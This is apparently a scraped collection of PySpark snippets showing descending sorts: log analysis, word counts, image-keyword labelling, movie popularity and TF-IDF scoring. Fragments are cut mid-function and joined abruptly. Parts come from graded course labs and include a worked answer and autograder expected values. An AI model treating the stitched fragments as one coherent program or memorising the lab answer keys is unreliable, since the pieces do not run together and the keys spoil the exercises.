                functions.asc("processing_meta.oldest_timestamp_string"))

            sorted_latest_descending_df = instance_usage_df.sort(
                functions.desc("processing_meta.latest_timestamp_string"))

            # Calculate the rate change by percentage
            oldest_dict = sorted_oldest_ascending_df.collect()[0].asDict()
            oldest_quantity = float(oldest_dict[
                                    "processing_meta"]["oldest_quantity"])

            latest_dict = sorted_latest_descending_df.collect()[0].asDict()
            latest_quantity = float(latest_dict[
                                    "processing_meta"]["latest_quantity"])

            rate_percentage = 100 * (
                (oldest_quantity - latest_quantity) / oldest_quantity)
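            # e.g. oldest_quantity = 10.0 and latest_quantity = 8.0 gives
            # 100 * ((10.0 - 8.0) / 10.0) = 20.0, i.e. a 20% drop over the period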

            # get any extra data
            extra_data_map = getattr(sorted_oldest_ascending_df.collect()[0],
                                     "extra_data_map", {})
        except Exception as e:
            raise PreHourlyCalculateRateException(
                "Exception occurred in pre-hourly rate calculation. Error: %s"
                % str(e))
        #  create a new instance usage dict
        instance_usage_dict = {"tenant_id":
                               latest_dict.get("tenant_id", "all"),
                               "user_id":
                               latest_dict.get("user_id", "all"),
                               "resource_uuid":
                               latest_dict.get("resource_uuid", "all"),
                               "geolocation":
                               latest_dict.get("geolocation", "all"),
                               "region":
                               latest_dict.get("region", "all"),
                               "zone":
                               latest_dict.get("zone", "all"),
                               "host":
                               latest_dict.get("host", "all"),
                               "project_id":
                               latest_dict.get("project_id", "all"),
                               "aggregated_metric_name":
                               latest_dict["aggregated_metric_name"],
                               "quantity": rate_percentage,
                               "firstrecord_timestamp_unix":
                               oldest_dict["firstrecord_timestamp_unix"],
                               "firstrecord_timestamp_string":
                               oldest_dict["firstrecord_timestamp_string"],
                               "lastrecord_timestamp_unix":
                               latest_dict["lastrecord_timestamp_unix"],
                               "lastrecord_timestamp_string":
                               latest_dict["lastrecord_timestamp_string"],
                               "record_count": oldest_dict["record_count"] +
                               latest_dict["record_count"],
                               "usage_date": latest_dict["usage_date"],
                               "usage_hour": latest_dict["usage_hour"],
                               "usage_minute": latest_dict["usage_minute"],
                               "aggregation_period":
                               latest_dict["aggregation_period"],
                               "extra_data_map": extra_data_map
                               }

        instance_usage_data_json = json.dumps(instance_usage_dict)
        instance_usage_data_json_list.append(instance_usage_data_json)

        # convert to rdd
        spark_context = instance_usage_df.rdd.context
        return spark_context.parallelize(instance_usage_data_json_list)
Example #52
comments = spark_read.parquet(path=data_dir.make_interim_path('comments'))
case_status_history = spark_read.parquet(
    path=data_dir.make_interim_path('case_status_history'))

ref_ids_escalated = (case_status_history.filter(
    F.col("inverse_time_to_next_escalation") > 0).select(
        'reference_id').distinct())
ref_ids_escalated.count()

comments_with_cutoff_times = spark_read.parquet(
    path=data_dir.make_processed_path('comments_with_cutoff_times'))

comments_with_cutoff_times.show()
comments_with_cutoff_times.groupby('comment_type').count().orderBy(
    F.desc('count')).show(n=100)

comment_types = [
    'general', 'programming', 'email', 'explanation', 'reproduction',
    'workaround', 'configuration', 'solution', 'symptom', 'problem',
    'educreferral'
]

encoded_comments_with_cutoff, one_hot_encoded_comment_columns = (
    one_hot_encode_categorical(df=comments_with_cutoff_times,
                               categorical_column='comment_type',
                               values_to_one_hot_encode=comment_types))
columns_for_label_encoding = ['comment_type', 'notes']

for col in columns_for_label_encoding:
    encoded_comments_with_cutoff = (label_encode_categorical_inplace(
Example #53
def run():
    topFolder = 'hdfs://172.16.241.100:9000/data/stuff/getty/'
    gettyImagesMetaFile = '{}allGettyMeta_1000000.csv'.format(topFolder)
    # imageId  kwIds  vcgImageId
    print(gettyImagesMetaFile)
    gettyKwIdCountFile = '{}gettyKwIdCount.csv'.format(topFolder)
    fields = [
        StructField("imageId", StringType()),
        StructField("kwIds", StringType()),
        StructField("vcgImageId", StringType())
    ]
    schema = StructType(fields)
    gettyImagesMeta_df = spark.read.format("csv").option(
        "header",
        "false").schema(schema).option("delimiter",
                                       '\t').load(gettyImagesMetaFile)
    # print('gettyImagesMeta_df: %s' % gettyImagesMeta_df.count())

    gettyImagesMeta_df = gettyImagesMeta_df.filter(
        gettyImagesMeta_df.kwIds.isNotNull()).rdd.filter(
            lambda row: row.kwIds is not None).toDF()

    # print('gettyImagesMeta_df kwIds not null count: %s' % gettyImagesMeta_df.count())

    # compute kwId count, generate kwIdsCount.csv

    def flatMap1(row):
        imageId = row.imageId
        kwIds_ = row.kwIds.split(',')
        rows = []
        for kwId in kwIds_:
            row = Row(imageId=imageId, kwId=kwId)
            rows.append(row)
        return rows

    gettyImagesMeta_df = gettyImagesMeta_df.rdd.filter(
        lambda row: ((row.kwIds is not None))).flatMap(
            lambda row: flatMap1(row)).toDF().cache()
    gettyImagesMeta_df.show(100, False)
    # print('total imageId-kwId count:%d' % gettyImagesMeta_df.count())

    gettyKwIdCount_df = gettyImagesMeta_df.groupBy("kwId").agg({
        '*': 'count'
    }).withColumnRenamed('count(1)', 'count')

    gettyKwIdCount_df = gettyKwIdCount_df.orderBy(desc("count"))
    gettyKwIdCount_df.show(100, False)

    gettyKwIdCount_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter", '\t').mode("overwrite").save(gettyKwIdCountFile)

    # analyze kwIdsCount.csv: sort by count desc, keep kwIds with count > topNum as labels, then generate the related files
    topNum = 300
    gettyKwIdCountFilteredFile = '{}gettyKwIdCountAbove{}.csv'.format(
        topFolder, topNum)
    labelsIndexMappingFile = '{}labelsIndexMappingAbove{}.csv'.format(
        topFolder, topNum)

    gettyKwIdCount_df = spark.read.format("csv").option(
        "header", "true").option("delimiter", '\t').load(gettyKwIdCountFile)
    gettyKwIdCount_df.show(10, False)

    gettyKwIdCount_df = gettyKwIdCount_df.filter(
        gettyKwIdCount_df['count'] > topNum)

    gettyKwIdCount_df = gettyKwIdCount_df.withColumn(
        "index",
        F.row_number().over(Window.orderBy(monotonically_increasing_id())) - 1)
    gettyKwIdCount_df.show(100, False)
    gettyKwIdCount_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter",
            '\t').mode("overwrite").save(gettyKwIdCountFilteredFile)

    gettyKwIdCount_df.select('index', 'kwId').repartition(1).write.format("com.databricks.spark.csv").option("header",
                                                                                                             "False") \
        .option("delimiter", '\t').mode("overwrite").save(
        labelsIndexMappingFile)
    kwIdsSet = set()

    kwIds = gettyKwIdCount_df.select('index', 'kwId').rdd.collect()
    for row in kwIds:
        kwIdsSet.add(row.kwId)
    print('filterd kwIds size: %d' % len(kwIdsSet))

    kwIdsSet_broadcast = spark.sparkContext.broadcast(kwIdsSet)

    gettytopNumImagesOfKwIdFile = '{}kwsTopNumImages.csv'.format(topFolder)
    # kwId,topNumImages

    finalImageKwIdsFile = '{}finalImageKwIds.csv'.format(topFolder)
    gettytopNumImagesOfKwId_df = spark.read.format("csv").option(
        "header", "false").option(
            "delimiter",
            '\t').load(gettytopNumImagesOfKwIdFile).withColumnRenamed(
                '_c0', 'kwId').withColumnRenamed('_c1', 'imageIds')
    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.filter(
        gettytopNumImagesOfKwId_df.imageIds.isNotNull())

    def filterKwIds(row):
        kwId = row.kwId
        if kwId in kwIdsSet_broadcast.value:
            return True
        else:
            return False

    def flatMaps(row):
        kwId = row.kwId
        imageIds = row.imageIds.split(',')
        rows = []
        for imageId in imageIds:
            row = Row(kwId=kwId, imageId=imageId)
            rows.append(row)
        return rows

    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.rdd.filter(
        lambda row: filterKwIds(row)).flatMap(
            lambda row: flatMaps(row)).toDF()

    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.groupBy(
        "imageId").agg({
            '*': 'count'
        }).withColumnRenamed('count(1)', 'count').drop('count')
    gettyImagesMeta_df = gettyImagesMeta_df.withColumnRenamed(
        'imageId', 'gettyImageId')
    # filter gettyImagesMeta_df, then merge imageId-kwId pairs into imageId-kwIds (aggregate operation)
    zero_value_2 = None

    def seqFunc_2(accumulator, element):
        if accumulator is None:
            return element
        else:
            element = accumulator + "," + element
            return element

    def combFunc_2(accumulator1, accumulator2):
        if accumulator1 is None:
            return accumulator2
        else:
            accumulator2 = accumulator1 + "," + accumulator2
            return accumulator2
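    # e.g. starting from zero_value_2 (None): seqFunc_2(None, "kw1") -> "kw1",
    # then seqFunc_2("kw1", "kw2") -> "kw1,kw2"; partial results from different
    # partitions are merged the same way: combFunc_2("kw1,kw2", "kw3") -> "kw1,kw2,kw3"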

    gettyImagesMeta_df = gettyImagesMeta_df.rdd.filter(lambda row: filterKwIds(
        row)).map(lambda row: (row.gettyImageId, row.kwId)).aggregateByKey(
            zero_value_2, seqFunc_2, combFunc_2).toDF().withColumnRenamed(
                '_2', 'kwIds').withColumnRenamed('_1', 'gettyImageId')
    gettyImagesMeta_df.show(100, False)

    finalImageKwIds_df = gettytopNumImagesOfKwId_df.join(
        gettyImagesMeta_df,
        gettyImagesMeta_df.gettyImageId == gettytopNumImagesOfKwId_df.imageId,
        how='inner').drop('imageId')
    # add new column url
    gettyImageUrlPrefix = 'https://elephant-data-backup.oss-cn-beijing.aliyuncs.com/elephant-data-backup/gettyimage/'

    def setUrl(gettyImageId):

        return '{}{}.jpg'.format(gettyImageUrlPrefix, gettyImageId)

    setUrlUdf = udf(setUrl, StringType())
    finalImageKwIds_df = finalImageKwIds_df.withColumn(
        'url', setUrlUdf('gettyImageId'))

    finalImageKwIds_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter", '\t').mode("overwrite").save(finalImageKwIdsFile)
 (u'/history/apollo/a-001/a-001-patch-small.gif', 97),
 (u'/images/Nasa-logo.gif', 85),
 (u'', 76),
 (u'/shuttle/resources/orbiters/atlantis.gif', 63),
 (u'/history/apollo/images/little-joe.jpg', 62),
 (u'/images/lf-logo.gif', 59),
 (u'/shuttle/resources/orbiters/discovery.gif', 56),
 (u'/shuttle/resources/orbiters/challenger.gif', 54),
 (u'/robots.txt', 53),
 (u'/history/apollo/pad-abort-test-2/pad-abort-test-2-patch-small.gif', 38)
]
Test.assertEquals(top_20_not_found, top_20_expected, 'incorrect top_20_not_found')

# (5d) Exercise: Listing the Top Twenty-five 404 Response Code Hosts

hosts_404_count_df = not_found_df.groupBy('host').count().sort(desc('count'))

print 'Top 25 hosts that generated errors:\n'
hosts_404_count_df.show(n=25, truncate=False)


top_25_404 = [(row[0], row[1]) for row in hosts_404_count_df.take(25)]
Test.assertEquals(len(top_25_404), 25, 'length of errHostsTop25 is not 25')

expected = set([
  (u'maz3.maz.net ', 39),
  (u'piweba3y.prodigy.com ', 39),
  (u'gate.barr.com ', 38),
  (u'nexus.mlckew.edu.au ', 37),
  (u'ts8-1.westwood.ts.ucla.edu ', 37),
  (u'm38-370-9.mit.edu ', 37),
Test.assertEquals(shakeWordsDF.columns, ['word'], "shakeWordsDF should only contain the Column 'word'")

# COMMAND ----------

# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC 
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC 
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
from pyspark.sql.functions import desc
topWordsAndCountsDF = wordCount(shakeWordsDF).orderBy(desc("count"),"word")
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')

# COMMAND ----------

# MAGIC %md
# MAGIC #### ** Prepare to the course autograder **
Example #56
                    .withColumn('rate', split(events['value'],',')[5].cast(FloatType()) )           \
                    .withColumn('action', split(events['value'],',')[6].cast(StringType()) )

#parsed_events.show(10,False)

###################################################################################################
# Displaying user count. 60 second window with 15 sec sliding duration...
###################################################################################################

# http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.functions.window
# pyspark.sql.functions.window(timeColumn, windowDuration, slideDuration=None, startTime=None)
windowedCounts = parsed_events.groupBy(
    window(parsed_events.datetime, "1 minutes", "15 seconds"),
    parsed_events.user) \
    .count()            \
    .sort(desc("count"))

query1 = windowedCounts \
    .writeStream \
    .outputMode("complete") \
    .format("console") \
    .start()

###################################################################################################
# Displaying average duration by user. 60 second window with 15 sec sliding duration...
###################################################################################################

windowedAvg = parsed_events.groupBy(
    window(parsed_events.datetime, "1 minutes", "15 seconds"),
    parsed_events.user) \
    .agg({'duration': 'mean'}) \
not200DF = logs_df.<FILL IN>
not200DF.show(10)
# Sorted DataFrame containing all endpoints and the number of times they were accessed with non-200 return code
logs_sum_df = not200DF.<FILL IN>

print 'Top Ten failed URLs:'
logs_sum_df.show(10, False)

# COMMAND ----------

# ANSWER
from pyspark.sql.functions import desc
not200DF = logs_df.filter(logs_df['status'] != 200)
not200DF.show(10)
# Sorted DataFrame containing all endpoints and the number of times they were accessed with non-200 return code
logs_sum_df = not200DF.groupBy('path').count().orderBy(desc('count'))

print 'Top Ten failed URLs:'
logs_sum_df.show(10, False)

# COMMAND ----------

# TEST Top ten error endpoints (4a)
top_10_err_urls = [(row[0], row[1]) for row in logs_sum_df.take(10)]
top_10_err_expected = [
  (u'/images/NASA-logosmall.gif', 8761),
  (u'/images/KSC-logosmall.gif', 7236),
  (u'/images/MOSAIC-logosmall.gif', 5197),
  (u'/images/USA-logosmall.gif', 5157),
  (u'/images/WORLD-logosmall.gif', 5020),
  (u'/images/ksclogo-medium.gif', 4728),
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from pyspark.sql.types import StructType, StructField, IntegerType, LongType

# Spark v3.0.1
spark = SparkSession.builder.master("local").appName(
    "PopularMovie").getOrCreate()
spark.sparkContext.setLogLevel("ERROR")

schema = StructType([
    StructField("userID", IntegerType(), True),
    StructField("movieID", IntegerType(), True),
    StructField("rating", IntegerType(), True),
    StructField("timestamp", LongType(), True),
])

moviesDF = spark.read.option("sep",
                             "\t").schema(schema).csv("./ml-100k/u.data")
topMovieIDs = moviesDF.groupBy("movieID").count().orderBy(F.desc("count"))
topMovieIDs.sort("movieID").show(10)

spark.stop()
        print("Usage: pretty-cluster.py <metadata> <input> <output> [<query>]", file=sys.stderr)
        exit(-1)
    sc = SparkContext(appName="Prettyprint Clusters")
    sqlContext = SQLContext(sc)

    outpath = sys.argv[3]
    (outputFormat, outputOptions) = guessFormat(outpath, "json")

    ## Should do more field renaming in meta to avoid clashing with fields in raw.
    meta = sqlContext.read.json(sys.argv[1])\
           .dropDuplicates(['series'])
    
    constructURL = udf(lambda url, corpus, id, regions: formatURL(url, corpus, id, regions))

    df = sqlContext.read.load(sys.argv[2]) \
        .withColumnRenamed('title', 'doc_title')\
        .withColumnRenamed('lang', 'doc_lang')\
        .withColumn('url', constructURL(col('page_access'), col('corpus'), col('id'), col('regions')))\
        .drop('locs').drop('pages').drop('regions')\
        .join(meta, 'series', 'left_outer')

    filtered = df.join(df.filter(sys.argv[4]).select('cluster').distinct(), 'cluster') \
               if len(sys.argv) >= 5 else df

    filtered.withColumn('lang', concat_ws(',', col('lang'))) \
            .orderBy(desc('size'), 'cluster', 'date', 'id', 'begin')\
            .write.format(outputFormat).options(**outputOptions).save(outpath)

    sc.stop()
    
Example #60
spark = SparkSession(sc)

rawData = sc.textFile("../data/subset-small.tsv")
fields = rawData.map(lambda x: x.split("\t"))
documents = fields.map(lambda x: x[3].split(" "))

documentNames = fields.map(lambda x: x[1])

hashingTF = HashingTF(100000)
tf = hashingTF.transform(documents)

tf.cache()
idf = IDF(minDocFreq=2).fit(tf)
tfidf = idf.transform(tf)

gettysburgTF = hashingTF.transform(['Gettysburg'])
gettysburgHashValue = int(gettysburgTF.indices[0])

gettysburgRelevance = tfidf.map(lambda x: float(x[gettysburgHashValue]))

zippedResults = gettysburgRelevance.zip(documentNames)

schema = StructType([StructField("score", FloatType(), True), StructField("document", StringType(), True)])

resultSchema = spark.createDataFrame(zippedResults, schema)
resultSchema.createOrReplaceTempView('Results')

print("Result: ")
resultSchema.sort(desc('score')).show()